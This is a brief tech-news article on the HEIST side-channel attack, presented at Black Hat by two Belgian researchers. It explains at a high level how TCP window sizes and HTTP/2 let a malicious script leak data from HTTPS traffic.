HEIST Attack Can Steal Confidential Data Including Banking Credentials from HTTPS-Encrypted Traffic
We have been taught that the using of HTTPS enabled website is safe from hackers hence most banks, email providers and other service providers use HTTPS encrypted websites. However, a new attack demonstrated at the Black Hat Conference proves otherwise.
Called the HEIST Attack, this new technique can attack the SSL/TLS and other secure channels purely in the browser to expose encrypted passwords, email addresses, Social Security numbers and other sensitive data.
Two Belgian security researchers, Mathy Vanhoef and Tom Van Goethem presented their latest work at the Black Hat security conference in Las Vegas. They named as HEIST, which stands for HTTP Encrypted Information can be Stolen through TCP-Windows.
HEIST basically brute-forces the size of small portions of data that get added to a page as it loads. As such, the attack can take a while. If the page is loaded using the next-gen version of HTTP, the HTTP/2 protocol, the time needed to carry out the attack is much shorter because HTTP/2 supports native parallel requests.
HEIST can be called a side-channel attack on HTTPS because instead of breaking the SSL encryption it leaks data exchanged in HTTPS traffic leaving it open to hackers for malicious gains. As data is transferred in small TCP packets, by guessing the size of these packets, an attacker can easily read their content.
The two presented their findings[pdf] at Black Hat on Wednesday.
The researchers showed how a side-channel attack could affect the way responses are sent at the TCP level, which could then grab a plaintext message. “Compression-based attacks [such as CRIME and BREACH] can now be performed purely in the browser, by any malicious website or script, without requiring network access,” the researchers said.